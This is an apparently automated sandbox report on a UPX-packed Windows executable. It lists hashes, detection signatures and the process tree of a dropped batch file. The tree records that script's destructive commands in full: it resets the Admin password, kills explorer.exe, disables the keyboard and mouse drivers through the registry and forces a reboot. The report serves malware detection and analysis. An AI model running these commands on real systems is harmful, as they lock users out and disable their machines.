Overview

overview

7

Static

static

7

575f9f1db9...5a.exe

windows7-x64

575f9f1db9...5a.exe

windows10-2004-x64

Analysis

  • max time kernel
    19s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12/01/2024, 19:59

Sharing

Copy URL Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    575f9f1db963a8ceb32d0460c7283c5a.exe

  • Size

    25KB

  • MD5

    575f9f1db963a8ceb32d0460c7283c5a

  • SHA1

    2c5815a38175ba63b1b0e8c73e2a7e8f56995cb1

  • SHA256

    e6cd384040aeca36cd27ba8da7f084519a12bcc1da94749cfab0f72018f85796

  • SHA512

    166185f2fe6437c0cf0b989c6ed1304365a55e90486b3033970e9645b01ce894257125e15c37e563fda30d0b9b0479c96b54334798d1e59449f278c0bb779159

  • SSDEEP

    768:U1NAUsbxtT6sFst/3IrdlLUwSnbcuyD7UhO:U1NAUwtT6sFstwrbUPnouy8hO

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in System32 directory 1 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\575f9f1db963a8ceb32d0460c7283c5a.exe
    "C:\Users\Admin\AppData\Local\Temp\575f9f1db963a8ceb32d0460c7283c5a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2580
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\3A90.tmp\EKLÝ ALBATROS MEGA.bat""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a c:\ntldr
        3⤵
        • Views/modifies file attributes
        PID:2340
      • C:\Windows\SysWOW64\attrib.exe
        attrib -s -h -r -a c:\boot.ini
        3⤵
        • Views/modifies file attributes
        PID:2816
      • C:\Windows\SysWOW64\net.exe
        net user Admin 753951456852
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2820
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user Admin 753951456852
          4⤵
            PID:2836
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h -r -a c:\windows\system32\taskmgr.exe
          3⤵
          • Drops file in System32 directory
          • Views/modifies file attributes
          PID:2740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im explorer.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2416
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im wscript.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2832
        • C:\Windows\SysWOW64\reg.exe
          reg addHKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f
          3⤵
            PID:1088
          • C:\Windows\SysWOW64\reg.exe
            reg addHKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f
            3⤵
              PID:2612
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown -r -c "Sistem top oldu canim, acil kapatmam lazim kusura bakma." -t 15
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2620
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x0
          1⤵
            PID:2592
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x1
            1⤵
              PID:2444

            Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\3A90.tmp\EKLÝ ALBATROS MEGA.bat
                    Filesize

                    2KB

                    MD5

                    c5ffffbfbd2b7302ba0379b1255a33b7

                    SHA1

                    03e39ae4f42a43ed9cda88ddd836486f54a65a4f

                    SHA256

                    60e2813bd116f5a8ad3b38607b8865e33fa5aaae47aa65d9e5417e473051b134

                    SHA512

                    6ec94809e64d8ba52ddc42a760cb0fb4c7f5338c662f9e8f25188bfdbce086d0cc1dbfa20cb72af7bda13328bad7fc23ccb44bea98a069cbf8dce14d68961c55

                    Download Submit

                  • memory/2444-12-0x00000000028A0000-0x00000000028A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2580-0-0x0000000000400000-0x0000000000413000-memory.dmp

                    Filesize

                    76KB

                    Download

                  • memory/2580-9-0x0000000000400000-0x0000000000413000-memory.dmp

                    Filesize

                    76KB

                    Download

                  • memory/2592-11-0x0000000002A40000-0x0000000002A41000-memory.dmp

                    Filesize

                    4KB

                    Download